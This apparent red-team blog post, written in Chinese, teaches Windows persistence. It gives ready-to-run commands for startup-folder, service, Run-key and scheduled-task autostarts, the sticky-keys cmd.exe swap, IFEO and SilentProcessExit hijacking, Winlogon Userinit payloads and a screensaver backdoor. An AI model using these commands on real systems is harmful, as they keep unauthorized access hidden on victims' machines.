<!DOCTYPE html>
<html lang="zh-CN" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="keywords" content="" />
  <meta name="author" content="F4tty" />
  <meta name="description" content="" />
  
  
  <title>
    
      内网权限维持(三)-自启动&amp;映像劫持&amp;屏保后门&amp;WinLogon 
      
      
      |
    
     F4tty
  </title>

  
    <link rel="apple-touch-icon" href="/images/favicon.png">
    <link rel="icon" href="/img/favicon.ico">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  <link rel="stylesheet" href="/css/main.css" />
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css" />
  <!-- 代码块风格 -->
  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<meta name="generator" content="Hexo 6.2.0"></head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/img/avatar.jpg" alt="">
      
    </a>
    <div class="nickname"><a href="/">F4tty</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">主页</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">归档</a>
        </li>
      
        <li class="nav-item" data-path="/categories/">
          <a href="/categories/">分类</a>
        </li>
      
        <li class="nav-item" data-path="/tags/">
          <a href="/tags/">标签</a>
        </li>
      
        <li class="nav-item" data-path="/friends/">
          <a href="/friends/">友链</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">关于我</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


  <!-- LaTex Display -->

  
    <script async type="text/javascript" src="/plugins/mathjax/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>





  <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>







  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">内网权限维持(三)-自启动&映像劫持&屏保后门&WinLogon</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime mr-10" title="更新时间"></i>
          2022-11-06 00:00:00
        </span>
        
              <span class="post-categories">
                <i class="iconfont icon-bookmark" title="分类"></i>
                
                <span class="span--category">
                  <a href="/categories/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/" title="内网安全">
                    <b>#</b> 内网安全
                  </a>
                </span>
                
              </span>
          
              <span class="post-tags">
                <i class="iconfont icon-tags mr-10" title="标签"></i>
                
                <span class="span--tag mr-8">
                  <a href="/tags/%E5%86%85%E7%BD%91/" title="内网">
                    #内网
                  </a>
                </span>
                
              </span>
          
      </div>
      <div class="markdown-body">
        <h1 id="内网权限维持-三-自启动-amp-映像劫持-amp-屏保后门-amp-WinLogon"><a href="#内网权限维持-三-自启动-amp-映像劫持-amp-屏保后门-amp-WinLogon" class="headerlink" title="内网权限维持(三)-自启动&amp;映像劫持&amp;屏保后门&amp;WinLogon"></a>内网权限维持(三)-自启动&amp;映像劫持&amp;屏保后门&amp;WinLogon</h1><h2 id="自启动"><a href="#自启动" class="headerlink" title="自启动"></a>自启动</h2><h3 id="1、自启动路径加载"><a href="#1、自启动路径加载" class="headerlink" title="1、自启动路径加载"></a>1、自启动路径加载</h3><p>将木马放到以下目录</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\</span><br></pre></td></tr></table></figure>

<p>重启机器即加载启动项运行木马<br><img src="/posts/963b23dc/1667696501226-f77932df-1fd7-4527-aa2a-a2c9ad1743ee.png" alt="image.png"></p>
<h3 id="2、自启动服务加载"><a href="#2、自启动服务加载" class="headerlink" title="2、自启动服务加载"></a>2、自启动服务加载</h3><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#创建自启动服务 路径执行木马</span></span><br><span class="line"><span class="built_in">sc</span> create ServiceTest binPath= C:\test.exe <span class="built_in">start</span>= auto</span><br><span class="line"><span class="comment">#删除该服务</span></span><br><span class="line"><span class="built_in">sc</span> delete ServiceTest</span><br></pre></td></tr></table></figure>

<p><img src="/posts/963b23dc/1667697583427-7ab0fb58-2bc8-4a9a-9be4-92156a77e1c5.png" alt="image.png"><br><img src="/posts/963b23dc/1667697620851-965eedba-7853-495c-bafe-21cd59c55873.png" alt="image.png"><br>重启电脑，即可上线<br><img src="/posts/963b23dc/1667697753812-99927196-7f6f-4ad5-a6c7-355fb86dbf84.png" alt="image.png"></p>
<h3 id="3、自启动注册表加载"><a href="#3、自启动注册表加载" class="headerlink" title="3、自启动注册表加载"></a>3、自启动注册表加载</h3><p>当前用户键值注册表路径:<br><code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run </code><br>服务器键值注册表路径（需要管理员权限）:<br><code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run </code><br>添加启动项</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">REG ADD <span class="string">&quot;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&quot;</span> /V <span class="string">&quot;backdoor&quot;</span> /t REG_SZ /F /D <span class="string">&quot;C:\test.exe&quot;</span></span><br></pre></td></tr></table></figure>

<p><img src="/posts/963b23dc/1667698191236-7c8ee93b-e4e3-4a2d-a6a8-bb2ace5ae2ca.png" alt="image.png"><br><img src="/posts/963b23dc/1667698482156-013beb79-61f8-41fe-8429-0e5b43d5b9ae.png" alt="image.png"><br><img src="/posts/963b23dc/1667698572986-06630cfd-e8ef-4586-ab09-ce6d6d84901b.png" alt="image.png"></p>
<h3 id="4、计划计时任务"><a href="#4、计划计时任务" class="headerlink" title="4、计划计时任务"></a>4、计划计时任务</h3><p>和横向移动at命令相同</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">#</span><span class="language-bash">每天01:02，以system权限启动木马</span></span><br><span class="line">schtasks /Create /TN TestService2 /SC DAILY /ST 01:02 /TR c:\test.exe /RL HIGHEST</span><br></pre></td></tr></table></figure>

<h2 id="粘滞键"><a href="#粘滞键" class="headerlink" title="粘滞键"></a>粘滞键</h2><p>系统自带的辅助功能进行替换执行，放大镜，旁白，屏幕键盘等均可。<br>粘滞键位置：<br>c:\windows\system32\sethc.exe<br>move sethc.exe sethc1.exe<br>copy cmd.exe sethc.exe</p>
<h2 id="映像劫持"><a href="#映像劫持" class="headerlink" title="映像劫持"></a>映像劫持</h2><blockquote>
<p>映像劫持是利用Windows的IFEO（Image File Execution Options）功能来实现的。IFEO实际上是Windows的一项正常功能，主要用于调试程序，其初衷是在程序启动的时候开启调试器来调试程序，这样一来可以在调试器中观察程序在难以重现的环境中的行为。例如，某个程序在随用户登录自动启动时会出错，但在登录后手动启动时却一切正常，这就可以通过IFEO设置一个调试器，无论程序何时启动，都会开启这个调试器对其进行调试，以便找出问题。很多病毒木马都会使用这种手段阻止安全软件的运行</p>
</blockquote>
<p>测试：执行notepad变为计算器</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">REG ADD &quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe&quot; /v debugger /t REG_SZ /d &quot;C:\Windows\System32\cmd.exe /c calc&quot;</span><br></pre></td></tr></table></figure>

<p><img src="/posts/963b23dc/1667699463838-5553e5e4-16f3-4fb5-a73b-a04ffaebe880.png" alt="image.png"><br><img src="/posts/963b23dc/1667699676425-257e81fd-551a-4293-be33-0b38ec6a3772.png" alt="image.png"><br>配合GlobalFlag隐藏：执行正常关闭后触发</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">reg add &quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe&quot; /v GlobalFlag /t REG_DWORD /d 512</span><br><span class="line">reg add &quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe&quot; /v ReportingMode /t REG_DWORD /d 1</span><br><span class="line">reg add &quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe&quot; /v MonitorProcess /d &quot;C:\xd.exe&quot;</span><br></pre></td></tr></table></figure>

<p><img src="/posts/963b23dc/1667699753460-e4396022-bfec-4a4e-8947-e240edbedddc.png" alt="image.png"><br>开启记事本然后关闭即触发运行木马<br><img src="/posts/963b23dc/1667699977401-4bfd3220-77d9-4dce-bee4-29e320683a33.png" alt="image.png"></p>
<h3 id="1、WinLogon配合无文件落地上线"><a href="#1、WinLogon配合无文件落地上线" class="headerlink" title="1、WinLogon配合无文件落地上线"></a>1、WinLogon配合无文件落地上线</h3><p>注册表<code>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon</code>中<code>Userinit</code>对应的值是当用户登录时触发的程序可以将该值的后面加上木马路径,当触发登录时也就执行了木马<br><img src="/posts/963b23dc/1667703155205-1348e67a-3857-4c9d-aba3-a556b30fdf74.png" alt="image.png"></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">REG ADD &quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon&quot; /V &quot;Userinit&quot; /t REG_SZ /F /D &quot;C:\Windows\System32\userinit.exe,C:\test.exe&quot;</span><br></pre></td></tr></table></figure>

<p><img src="/posts/963b23dc/1667703857264-7b976698-39d3-41a4-9d69-d23c14eda660.png" alt="image.png"><br>接下来注销重新登录触发木马<br><img src="/posts/963b23dc/1667704721751-77e83ce5-8c4a-4b2f-b5b9-8c48d1724b34.png" alt="image.png"><br>还可以利用cs生成powershell payload实现无文件落地上线<br><img src="/posts/963b23dc/1667707347980-1c55ead5-ef5b-4858-98a0-c7f55c62c6bf.png" alt="image.png"></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">REG ADD &quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon&quot; /V &quot;Userinit&quot; /t REG_SZ /F /D &quot;C:\Windows\System32\userinit.exe,[powershell payload]&quot;</span><br></pre></td></tr></table></figure>

<p><img src="/posts/963b23dc/1667707878353-2c0978e9-b23b-425f-839c-4f71cfcf1ed9.png" alt="image.png"></p>
<h2 id="屏保-amp-登录"><a href="#屏保-amp-登录" class="headerlink" title="屏保&amp;登录"></a>屏保&amp;登录</h2><h3 id="2、屏幕保护生效后执行后门"><a href="#2、屏幕保护生效后执行后门" class="headerlink" title="2、屏幕保护生效后执行后门"></a>2、屏幕保护生效后执行后门</h3><p>如果选择了屏幕保护程序那么注册表<code>HKEY_CURRENT_USER\Control Panel\Desktop</code>中SCRNSAVE.EXE的值就是对应的屏幕保护程序，如果把这个值改为我们的木马程序那么当开启屏幕保护时也就触发了木马<br><img src="/posts/963b23dc/1667702046308-49f5a358-765f-4f3c-a9ec-27aa0cf6943e.png" alt="image.png"></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">reg add &quot;HKEY_CURRENT_USER\Control Panel\Desktop&quot; /v SCRNSAVE.EXE /t REG_SZ /d &quot;C:\test.exe&quot; /f</span><br></pre></td></tr></table></figure>

<p><img src="/posts/963b23dc/1667702268999-84396f99-1c6d-48d0-8c63-561353026e51.png" alt="image.png"></p>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/posts/a5dc2208/" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>上一页</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime mr-10" title="更新时间"></i>
              2022-11-06 00:00:00
            </span>
            
                  <span class="post-categories">
                    <i class="iconfont icon-bookmark" title="分类"></i>
                    
                    <span class="span--category">
                      <a href="/categories/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/" title="内网安全">
                        <b>#</b> 内网安全
                      </a>
                    </span>
                    
                  </span>
              
                  <span class="post-tags">
                    <i class="iconfont icon-tags mr-10" title="标签"></i>
                    
                    <span class="span--tag mr-8">
                      <a href="/tags/%E5%86%85%E7%BD%91/" title="内网">
                        #内网
                      </a>
                    </span>
                    
                  </span>
              
          </div>
          <div class="post-foot-prev">
            
              <a href="/posts/cf253a42/" target="_self">
                <span>下一页</span>
                <i class="iconfont icon-chevronright"></i>
              </a>
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">目录</div>
    <div class="catalog-content">
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%86%85%E7%BD%91%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81-%E4%B8%89-%E8%87%AA%E5%90%AF%E5%8A%A8-amp-%E6%98%A0%E5%83%8F%E5%8A%AB%E6%8C%81-amp-%E5%B1%8F%E4%BF%9D%E5%90%8E%E9%97%A8-amp-WinLogon"><span class="toc-text">内网权限维持(三)-自启动&amp;映像劫持&amp;屏保后门&amp;WinLogon</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%87%AA%E5%90%AF%E5%8A%A8"><span class="toc-text">自启动</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1%E3%80%81%E8%87%AA%E5%90%AF%E5%8A%A8%E8%B7%AF%E5%BE%84%E5%8A%A0%E8%BD%BD"><span class="toc-text">1、自启动路径加载</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2%E3%80%81%E8%87%AA%E5%90%AF%E5%8A%A8%E6%9C%8D%E5%8A%A1%E5%8A%A0%E8%BD%BD"><span class="toc-text">2、自启动服务加载</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3%E3%80%81%E8%87%AA%E5%90%AF%E5%8A%A8%E6%B3%A8%E5%86%8C%E8%A1%A8%E5%8A%A0%E8%BD%BD"><span class="toc-text">3、自启动注册表加载</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4%E3%80%81%E8%AE%A1%E5%88%92%E8%AE%A1%E6%97%B6%E4%BB%BB%E5%8A%A1"><span class="toc-text">4、计划计时任务</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%B2%98%E6%BB%9E%E9%94%AE"><span class="toc-text">粘滞键</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%98%A0%E5%83%8F%E5%8A%AB%E6%8C%81"><span class="toc-text">映像劫持</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1%E3%80%81WinLogon%E9%85%8D%E5%90%88%E6%97%A0%E6%96%87%E4%BB%B6%E8%90%BD%E5%9C%B0%E4%B8%8A%E7%BA%BF"><span class="toc-text">1、WinLogon配合无文件落地上线</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B1%8F%E4%BF%9D-amp-%E7%99%BB%E5%BD%95"><span class="toc-text">屏保&amp;登录</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#2%E3%80%81%E5%B1%8F%E5%B9%95%E4%BF%9D%E6%8A%A4%E7%94%9F%E6%95%88%E5%90%8E%E6%89%A7%E8%A1%8C%E5%90%8E%E9%97%A8"><span class="toc-text">2、屏幕保护生效后执行后门</span></a></li></ol></li></ol></li></ol>
      
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
      <div class="comments-container">
        







      </div>
    
  </div>


        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          <a title="github" target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">
            <i class="iconfont icon-github"></i>
          </a>
        </li>
      
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Copyright © 2023 Oranges</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Theme by Oranges | Powered by Hexo</a>
        
    </div>
  
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="搜索...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>首次搜索，正在载入索引文件，请稍后……<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>没有找到内容，请尝试更换检索词。<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>未找到search.xml文件，具体请参考：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>请求失败，尝试重新刷新页面或稍后重试。<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + %E5%86%85%E7%BD%91%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81(%E4%B8%89)-%E8%87%AA%E5%90%AF%E5%8A%A8%26%E6%98%A0%E5%83%8F%E5%8A%AB%E6%8C%81%26%E5%B1%8F%E4%BF%9D%E5%90%8E%E9%97%A8%26WinLogon + '&url=' + http%3A%2F%2Fexample.com%2Fposts%2F963b23dc%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=http://example.com/posts/963b23dc/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
